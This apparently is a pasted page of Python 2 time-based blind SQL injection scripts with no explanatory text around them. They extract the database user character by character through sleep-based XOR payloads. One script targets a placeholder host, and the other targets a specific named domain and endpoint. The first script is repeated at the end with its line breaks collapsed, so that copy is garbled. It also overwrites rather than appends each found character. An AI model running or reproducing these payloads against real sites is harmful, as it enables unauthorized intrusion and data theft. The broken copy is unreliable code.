时间盲注脚本.py

时间盲注脚本

#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import time

payloads = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.'    #匹配用的字符串

user=''
print 'Start to retrive current user:'
for i in range(1,23):
        for payload in payloads:    #遍历取出字符
                startTime=time.time()
                url = """http://XXXXX.cn/default.php?fid=1-if(now()<sysdate(),sleep(0),0)/*'XOR(if(ascii(substring(user(),"""+str(i)+""",1))="""+str(ord(payload))+""",sleep(20),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/"""
                response=requests.get(url, timeout=30)
                if time.time() - startTime > 15:
                        user =payload
                        print 'user is:', user
                        break
print '
[Done] current user is %s' % user

#encoding=utf-8
import httplib
import time
import string
import sys
import random
import urllib

headers = {}
payloads = 'abcdefghijklmnopqrstuvwxyz0123456789@_.ABCDEFGHIJKLMNOPQRST'
print '[%s] Start to retrive MySQL User:' % time.strftime('%H:%M:%S', time.localtime())
user = ''
for i in range(1, 21):#21是user判断出的长度+1
    for payload in payloads:
        try:
            s = "ascii(mid(lower(user()),%s,1))=%s" % (i, ord(payload))
            s = "aaa'XOR(if(%s,sleep(3),0))OR'bbb" % s
            conn = httplib.HTTPConnection('kact.kingdee.com', timeout=3)#输入网站地址
            conn.request(method='GET',url="/world/createArticle?corp_id=%s" % urllib.quote(s))
            conn.getresponse()
            conn.close()
            print '.',
        except:
            user += payload
            print '
[in progress]', user,
            time.sleep(3.0)
            break
        
print '
[Done] MySQL user is %s' % user

　　

#!/usr/bin/env python# -*- coding: utf-8 -*-import requestsimport time
payloads = 'abcdefghigklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@_.'    #匹配用的字符串
user=''print 'Start to retrive current user:'for i in range(1,23):        for payload in payloads:    #遍历取出字符                startTime=time.time()                url = """http://XXXXX.cn/default.php?fid=1-if(now()<sysdate(),sleep(0),0)/*'XOR(if(ascii(substring(user(),"""+str(i)+""",1))="""+str(ord(payload))+""",sleep(20),0))OR'"XOR(if(now()=sysdate(),sleep(0),0))OR"*/"""                response=requests.get(url, timeout=30)                if time.time() - startTime > 15:                        user =payload                        print 'user is:', user                        breakprint ' [Done] current user is %s' % user